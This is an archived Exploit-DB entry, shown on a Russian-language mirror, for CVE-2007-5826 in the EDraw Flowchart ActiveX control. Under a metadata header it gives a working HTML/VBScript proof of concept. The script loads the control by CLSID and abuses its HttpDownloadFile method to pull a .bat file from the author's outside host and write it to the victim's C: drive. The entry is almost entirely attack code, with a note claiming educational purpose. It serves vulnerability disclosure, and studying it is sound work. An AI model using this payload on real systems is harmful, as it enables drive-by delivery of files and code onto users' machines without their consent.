- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4598
- Проверка EDB
- 
	
		
			- Пройдено
 
- Автор
- SHINNAI
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2007-5826
- Дата публикации
- 2007-11-02
		HTML:
	
	<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------------------------------
 <b>EDraw Flowchart ActiveX Control (EDImage.ocx v. 2.0.2005.1104) "HttpDownloadFile()" Insecure Method</b>
 url: http://www.anydraw.com
 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 <b><font color='red'>This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.</font></b>
 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------------------------------
<object classid='clsid:F685AFD8-A5CC-410E-98E4-BAA1C559BA61' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
  Sub tryMe
   On Error Resume Next
     test.HttpDownloadFile "http://www.shinnai.altervista.org/shinnai.bat", "c:\shinnai.bat"
     MsgBox("Exploit completed!")
  End Sub
</script>
</span></span>
</code></pre>
# milw0rm.com [2007-11-02]- Источник
- www.exploit-db.com
 
 
		